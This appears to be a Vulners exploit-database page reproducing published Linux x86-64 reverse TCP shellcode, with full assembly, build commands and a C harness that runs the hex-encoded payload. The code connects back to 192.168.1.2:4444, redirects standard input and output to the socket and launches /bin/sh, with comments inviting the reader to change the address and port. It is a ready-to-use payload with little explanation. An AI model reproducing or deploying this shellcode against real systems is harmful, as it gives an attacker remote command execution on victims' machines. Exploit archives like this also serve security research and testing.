Vulners
Lucene search
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)
/*
;Title: Linux/x86_64 - Reverse Shell Shellcode (192.168.1.2:4444)
;Author: Touhid M.Shaikh
;Contact: https://github.com/touhidshaikh
;Category: Shellcode
;Architecture: Linux x86_64
;Description: Reverse Shell, Run nc and listen port 4444.
;Shellcode Length: 153
;Tested on : Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux
===COMPILATION AND EXECUTION Assemmbly file===
#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
#ld shell.o -o shell <=== Making Binary File
#./bin2shell.sh shell <== xtract hex code from the binary(
https://github.com/touhidshaikh/bin2shell)
=================SHELLCODE(INTEL FORMAT)=================
global _start
_start:
xor rax,rax
add rax, 41
xor rdi,rdi
mov rdx, rdi
add rdi, 2
xor rsi,rsi
add rsi, 1
syscall
mov rdi, rax
xor rax, rax
push rax
add rax,0x2
mov dword [rsp-4], 0x0201a8c0 : IP : 192.168.1.2, Change what u
want(Little Endian)
mov word [rsp-6], 0x5c11 ; PORT : 4444, Change what u
want(Little Endian)
mov word [rsp-8], ax
sub rsp, 8
add rax, 40
mov rsi, rsp
xor rdx,rdx
add rdx, 16
syscall
xor rax,rax
mov rsi, rax
add rax, 33
syscall
xor rax,rax
add rax, 33
xor rsi,rsi
add rsi, 1
syscall
xor rax, rax
add rax, 33
xor rsi,rsi
add rsi, 2
syscall
xor rax, rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
mov rdi, rsp
push rax
mov rdx, rsp
push rdi
mov rsi, rsp
add rax, 59
syscall
===================END HERE============================
====================FOR C Compile===========================
Compile with gcc with some options.
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x48\x31\xc0\x48\x83\xc0\x29\x48\x31\xff\x48\x89\xfa\x48\x83\xc7\x02\x48\x31\xf6\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x48\x83\xc0\x02\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x11\x5c\x66\x89\x44\x24\xf8\x48\x83\xec\x08\x48\x83\xc0\x28\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x89\xc6\x48\x83\xc0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x48\x83\xc6\x02\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2017 00:00Current
0.1Low risk
Vulners AI Score0.1